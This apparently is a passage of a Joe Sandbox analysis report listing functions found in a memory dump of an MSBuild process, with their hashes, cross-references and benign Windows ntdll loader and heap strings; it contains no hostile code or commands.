Instruction ID: 1de3a93fc61798b0fba4fdff930ad245314088f399ae9782bd700b2df1af8239
Opcode Fuzzy Hash: 98f88915a0de81f930f0b80e900c17146cf609f7cf346648bc8c41969bb819b6
Instruction Fuzzy Hash: 09914672645702EFDB31EF28C988B6BB7E8EB94714F050458FA456B250C779EC04C792

Function 01A6EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 01A6EB62
, xrefs: 01A6F299
T, xrefs: 01A6EB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01A6EB6C
{, xrefs: 01AC4643
LdrpResSearchResourceInsideDirectory Enter, xrefs: 01A6EB58

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 5288c644befd53dea0d9fc6eabd3e029938a074b4d55d3bdd2605f2553455c10
Instruction ID: fda486111d0e4a4496f7e8624a6af60ef402c01d4a5f9286a4cb788c05e36da1
Opcode Fuzzy Hash: 5288c644befd53dea0d9fc6eabd3e029938a074b4d55d3bdd2605f2553455c10
Instruction Fuzzy Hash: 65A25A74A0562ACFDF64CF28CDA87A9BBB5AF49704F1442E9D90DA7251DB309E84CF04

Function 01A963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01AD413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01AD41FE
Delaying execution failed with status 0x%08lx, xrefs: 01AD4258
minkernel\ntdll\ldrinit.c, xrefs: 01AD40E9, 01AD414B, 01AD420F, 01AD4269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01AD40D8
_LdrpInitialize, xrefs: 01AD40DF, 01AD4141, 01AD4205, 01AD425F

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 9d324750a16ee6fcdcb44bd9612ac633a9346c364a2bcd23c88e0e5abe4a294a
Instruction ID: 5fa6601742b4691de56a6c59bebae1a47c0a917e9170c13b877c2f5d40a6896c
Opcode Fuzzy Hash: 9d324750a16ee6fcdcb44bd9612ac633a9346c364a2bcd23c88e0e5abe4a294a
Instruction Fuzzy Hash: BC916931B007169BEF35DF68DA44BAE7BF1BF84B24F040129E9066B682D7749841CBD0

Function 01A5645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AB99ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AB9A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AB9A2A
minkernel\ntdll\ldrinit.c, xrefs: 01AB9A11, 01AB9A3A
LdrpInitShimEngine, xrefs: 01AB99F4, 01AB9A07, 01AB9A30
apphelp.dll, xrefs: 01A56496

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: ad521609c45686c05a990c7e397b3eb5312111b1a42fc57ed4803af4fdba1e68
Instruction ID: 8e3945e7d4b361db540d26c4c03943965ec6a8b852194b717fa26c52e3839e53
Opcode Fuzzy Hash: ad521609c45686c05a990c7e397b3eb5312111b1a42fc57ed4803af4fdba1e68
Instruction Fuzzy Hash: 5251C3B1248345AFE721DF24D981FAB7BE8FB84748F44051EFA8997261D730E905CB92

Function 01A9C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01A9C6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 01AD81E5
LdrpInitializeImportRedirection, xrefs: 01AD8177, 01AD81EB
Loading import redirection DLL: '%wZ', xrefs: 01AD8170
minkernel\ntdll\ldrinit.c, xrefs: 01A9C6C3
minkernel\ntdll\ldrredirect.c, xrefs: 01AD8181, 01AD81F5

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 73056537fbf072b5784d3c5bbaf4a05dc1d6b239e178d16ed32d16ecb5ddd78e
Instruction ID: 193b00a42bc007070c28ef811009f2fee72e9a414c14f6b3eaed31064d83c907
Opcode Fuzzy Hash: 73056537fbf072b5784d3c5bbaf4a05dc1d6b239e178d16ed32d16ecb5ddd78e
Instruction Fuzzy Hash: EA31E471644706AFC724EF29DE46E2AB7E4BFD4B20F040558F945AB291E760EC04CBE2

Function 01A92674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01AD2160, 01AD219A, 01AD21BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AD2180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AD21BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AD219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AD2178
SXS: %s() passed the empty activation context, xrefs: 01AD2165

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: a55a242c3381316094ccc45969af7b86442841610ff73dc13bd36e3e08b37f00
Instruction ID: 81066a035b9212d649199857c19d3c346548a53ff81ecc15b5a230e73078b8dc
Opcode Fuzzy Hash: a55a242c3381316094ccc45969af7b86442841610ff73dc13bd36e3e08b37f00
Instruction Fuzzy Hash: EF31E736B403157BFB218AAA8C45F5E7AB8EB95A50F09405AFB05BB140D7709A40C6A1

Function 01AA096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01AA2DF0: LdrInitializeThunk.NTDLL ref: 01AA2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AA0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AA0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AA0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AA0D74

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: b0a7204af374cfe5d82a8612799508317fc98334169772840c467723652ba166
Instruction ID: bf393f32e5113c997fac506d089204b1697f0eeb3cf096f3f6339b02eeb6d584
Opcode Fuzzy Hash: b0a7204af374cfe5d82a8612799508317fc98334169772840c467723652ba166
Instruction Fuzzy Hash: 52426C71900715DFDB21CF28C980BAAB7F4BF04314F5445AAE99AEB241E770EA85CF61

Function 01A6A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 01A6A3FF
LdrResFallbackLangList Enter, xrefs: 01A6A3EF
6, xrefs: 01A6A3F7
8, xrefs: 01A6A3E7

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 455b4e5d05e0632db2849c20f0413719609d1a7573a3ecb68b7891f1cb7b11b2
Instruction ID: db89ebc49e0e9e63393796017f44faee1e119cd94cea2ede11689f5eccec38f7
Opcode Fuzzy Hash: 455b4e5d05e0632db2849c20f0413719609d1a7573a3ecb68b7891f1cb7b11b2
Instruction Fuzzy Hash: F8C17974108382CFD711CF68C544B6AB7F8BF84704F08896EF996AB252E734DA49CB56

Function 01A98402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A9855E
LdrpInitializeProcess, xrefs: 01A98422
@, xrefs: 01A98591
minkernel\ntdll\ldrinit.c, xrefs: 01A98421

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b7a77c1305cf52476b849b419184044c3cd999414db2b7388a7bc4a0c3972ab1
Instruction ID: 5f767e4e9d87e8a918126360807dce034b0f2e565ec78e58c2252e8fc341e6e7
Opcode Fuzzy Hash: b7a77c1305cf52476b849b419184044c3cd999414db2b7388a7bc4a0c3972ab1
Instruction Fuzzy Hash: C6918A71508349AFEB21EF65CD40FABBBE8BF85744F40492EFA8592151E334D948CB62

Function 01A9273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 01A928D8
SXS: %s() passed the empty activation context, xrefs: 01AD21DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AD22B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AD21D9, 01AD22B1

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: e22f659671e21d3b43de34e2df01b91cf3e35e1903b8d8ab06859d87ce754d41
Instruction ID: 885f187259165f44da3b253714fedce987344a490cb31deb9d0c8b9481d6d94a
Opcode Fuzzy Hash: e22f659671e21d3b43de34e2df01b91cf3e35e1903b8d8ab06859d87ce754d41
Instruction Fuzzy Hash: 4EA18D31940229ABDF25CF68DC84BA9B7B1BF58354F1545EAE909EB251D7309EC0CF90

Function 01A94AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AD342A
RtlDeactivateActivationContext, xrefs: 01AD3425, 01AD3432, 01AD3451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AD3437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AD3456

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 6957572b5096df5ff0a9b8a5804303b10a13be243bffc8b62bb780f33e84aef2
Instruction ID: 267e217db01974a5f0470b04b7585a07604be6adb7ecf54a0498196cde1c25b3
Opcode Fuzzy Hash: 6957572b5096df5ff0a9b8a5804303b10a13be243bffc8b62bb780f33e84aef2
Instruction Fuzzy Hash: 2D6136B6600B129FDB22CF1DC941B3AB7E5FF84B51F18851DE8569B241D738E842CB92

Function 01A664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AC10AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AC1028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AC106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AC0FE5

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 33a5ea51b5683b620d0a03eb604c7a7601039a49661720814ae5e0a9757edfc9
Instruction ID: b7644626e370909a39066b84f4fdb9046630c83e05d60ed87d9ae812b6e15125
Opcode Fuzzy Hash: 33a5ea51b5683b620d0a03eb604c7a7601039a49661720814ae5e0a9757edfc9
Instruction Fuzzy Hash: 8971CEB1904346AFCB21DF28C985B9B7FACEF95764F440468F9488B286D734D588CBD2

Function 01A8245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 01ACA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01ACA992
minkernel\ntdll\ldrinit.c, xrefs: 01ACA9A2
apphelp.dll, xrefs: 01A82462

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 20fdd66bb3b2c55344efbf7d2fc814d2ce206fe35a72e71693ea116d2741eadd
Instruction ID: a837f3db9d5738b9de851b45d5170b9c248df55f5d84dbee5fafcf5898f58638
Opcode Fuzzy Hash: 20fdd66bb3b2c55344efbf7d2fc814d2ce206fe35a72e71693ea116d2741eadd
Instruction Fuzzy Hash: EE316872A00305EBDB35AF5DD985FBABBB4FB84B04F15001EE900A7255E7705881CB90

Function 01A729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01A73255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A7327D
HEAP: , xrefs: 01A73264

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 5013648c21a362961d3bc64148668e81ccee1dd4eb7a5120497ccaf890396c9e
Instruction ID: 451a34b985ff9259daf939e9d89bfb7cdc710a81cc15e07f60cad17ecb2be2ba
Opcode Fuzzy Hash: 5013648c21a362961d3bc64148668e81ccee1dd4eb7a5120497ccaf890396c9e
Instruction Fuzzy Hash: C092CD71A042499FDF25CF68C8407AEBBF1FF48300F19849AE989AB352D735AA45DF50

Function 01A70770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01AC50AE
(UCRBlock->Size >= *Size), xrefs: 01AC50CA
HEAP: , xrefs: 01AC50BD

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 7a8f5e900b74b363d6dcfe1fcbe4008c8df06deda0d7fd11f1c4b0fb3de66be3
Instruction ID: 980e8c87767c0f31270d56669a042031f679255de3fce21de5c439c69f609946
Opcode Fuzzy Hash: 7a8f5e900b74b363d6dcfe1fcbe4008c8df06deda0d7fd11f1c4b0fb3de66be3
Instruction Fuzzy Hash: D6F18A70B00606DFEB25DF68C984B6AB7F6FF85704F1481A9F4569B391D730AA81CB90

Function 01A86962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01A86C24
, xrefs: 01ACCA51

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 3bcacc72425eeecd60ae0ef1d6590ddba1e35e3e02bf18bf0a8e716af3e37a09
Instruction ID: 38717b0e10bd154c19bef4aeaa64a914ba688d1fe8d95ffe3c5d5828cd51fc77
Opcode Fuzzy Hash: 3bcacc72425eeecd60ae0ef1d6590ddba1e35e3e02bf18bf0a8e716af3e37a09
Instruction Fuzzy Hash: 37C2A071A083419FEB25DF68C880BABBBE5BF88754F18892DF989C7241D734D845CB52

Function 01A5A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 01ABC1E4
FilterFullPath, xrefs: 01ABC2E6
UseFilter, xrefs: 01A5A1C1

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: d7c36cd7860483b9933491fe44b98ac31cc9cc8da49aa65792c154e243285b1c
Instruction ID: a220c0f7e80e4f89ed0492f90c4c511c69e17e63b91b919edb0f6201e07fc800
Opcode Fuzzy Hash: d7c36cd7860483b9933491fe44b98ac31cc9cc8da49aa65792c154e243285b1c
Instruction Fuzzy Hash: 83A159719112699BDB31AF68CD88BEAB7B8FF44710F1001EAE909A7251D7359F84CF50

Function 01A80BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 01ACA10F
minkernel\ntdll\ldrinit.c, xrefs: 01ACA121
LdrpCheckModule, xrefs: 01ACA117

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 5731edd9c235f19f35421ee51e1d410622dbf5741a2f31a4eb2c9f329963e624
Instruction ID: 1051ec4a178ab2f8d9f875e795356c9c48c36d0f4e689b9cbc138919619891d9
Opcode Fuzzy Hash: 5731edd9c235f19f35421ee51e1d410622dbf5741a2f31a4eb2c9f329963e624
Instruction Fuzzy Hash: 73719EB1A003099FDB25EF68CA85BBEB7F4FB84704F18446DE906E7251E734A985CB50

Function 01A9C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 01AD82DE
Failed to reallocate the system dirs string !, xrefs: 01AD82D7
minkernel\ntdll\ldrinit.c, xrefs: 01AD82E8

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 3a4f0ae9b8db57ff728f58d9386c31f6482ac95ccac0951e77c5a816d708564f
Instruction ID: 319565fc07cc7519682e699c2dc22679f81a3c078b26ee0e24ac30aa2a5964b6
Opcode Fuzzy Hash: 3a4f0ae9b8db57ff728f58d9386c31f6482ac95ccac0951e77c5a816d708564f
Instruction Fuzzy Hash: 0141F371944701ABCB21EB68DD44B9F77E8FF48760F04492AF949D7254EB74D900CBA1

Function 01B1C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B1C1C5
PreferredUILanguages, xrefs: 01B1C212
@, xrefs: 01B1C1F1

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 57d5bdd898bdc3e42d6325159b48c7b45545e7b86fbaad77144f1096330ecf6b
Instruction ID: 21f2c86c39d01141d0f3554e52731973a6c8dd63f5e95e09d137324204b17224
Opcode Fuzzy Hash: 57d5bdd898bdc3e42d6325159b48c7b45545e7b86fbaad77144f1096330ecf6b
Instruction Fuzzy Hash: 1A418371E4020AEBDF15DFD8C941FEEBBB8EB14700F4141AAEA09B7244D7749A44CB90

Function 01AF4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01AF4160
LdrpResValidateFilePath Exit, xrefs: 01AF4172
@, xrefs: 01AF4225

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 914ed9349e9c8b568e35bcbc4bc63193a2ac93d45b3b7c1555fab920b76686c6
Instruction ID: 8cc80d21c5d3916436a5ce56a3817229c10b82c783ec133f2d0e848468d0fa6e
Opcode Fuzzy Hash: 914ed9349e9c8b568e35bcbc4bc63193a2ac93d45b3b7c1555fab920b76686c6
Instruction Fuzzy Hash: E2411771A047988FEB25DBE8C944BAEBBB8FF59340F14046EEA41EB791D7348901CB15

Function 01AE4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 01AE488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AE4888
minkernel\ntdll\ldrredirect.c, xrefs: 01AE4899

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 0571f207d43c6ae116039def9a8c1707a14d9a249aaf6df891c3763b250b2873
Instruction ID: 9142ed3b69f4d3937110b4a89d72ead98a03b6ea7a6ee335bf489c7a2842f4b1
Opcode Fuzzy Hash: 0571f207d43c6ae116039def9a8c1707a14d9a249aaf6df891c3763b250b2873
Instruction Fuzzy Hash: 4C419D32A047519BCB22CF6DD948A267BE9BF8DA50F0A0669ED59DB211D730EC00CBD1

Function 01A70BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01AC5449
HEAP[%wZ]: , xrefs: 01AC5431
HEAP: , xrefs: 01AC543E

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 45abe95c764ae5a40f7aa1d109a546ae33bca7f1c511edff2c200d00373b1bf7
Instruction ID: 452bbc3f63372a0f8c0444a10da08039b2be974d85ff2d8aaa3193038c510fba
Opcode Fuzzy Hash: 45abe95c764ae5a40f7aa1d109a546ae33bca7f1c511edff2c200d00373b1bf7
Instruction Fuzzy Hash: 24119A31719142DFDB29DB29CA41F7AF3A6AF82A16F18816DF406CB252DB30E940C750

Function 01AE20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01AE20F3
LdrpInitializationFailure, xrefs: 01AE20FA
minkernel\ntdll\ldrinit.c, xrefs: 01AE2104

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: cf6dcc97895cf739efd85cf50d42e228fe207514dccefbb76bf1275597c0b472
Instruction ID: c3cd80089ebb0607e71ab6220920c95b38a2120791b1e4dc576a9f0f3bbc8782
Opcode Fuzzy Hash: cf6dcc97895cf739efd85cf50d42e228fe207514dccefbb76bf1275597c0b472
Instruction Fuzzy Hash: 32F0FC356803087BE724EB4CDD46F993BACFB80B54F14006AF6007B281D3F0E640CA51

Function 01A703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AC4D8A

Strings

#%u, xrefs: 01AC4D82

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: bdcb34b374a9da6bf170f362a0b2cefcf062fc587e346dc3511ccfc7c5766646
Instruction ID: 6de84986b1526ad8adae3629147ea6eb900bc8adbfa8e5127dc748f96ee878a5
Opcode Fuzzy Hash: bdcb34b374a9da6bf170f362a0b2cefcf062fc587e346dc3511ccfc7c5766646
Instruction Fuzzy Hash: 34712C71A0014A9FDB01DFA8CA94FAEBBF8BF18704F154069E905E7251EB34EE05CB65

Function 01A6A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 01A6AA25
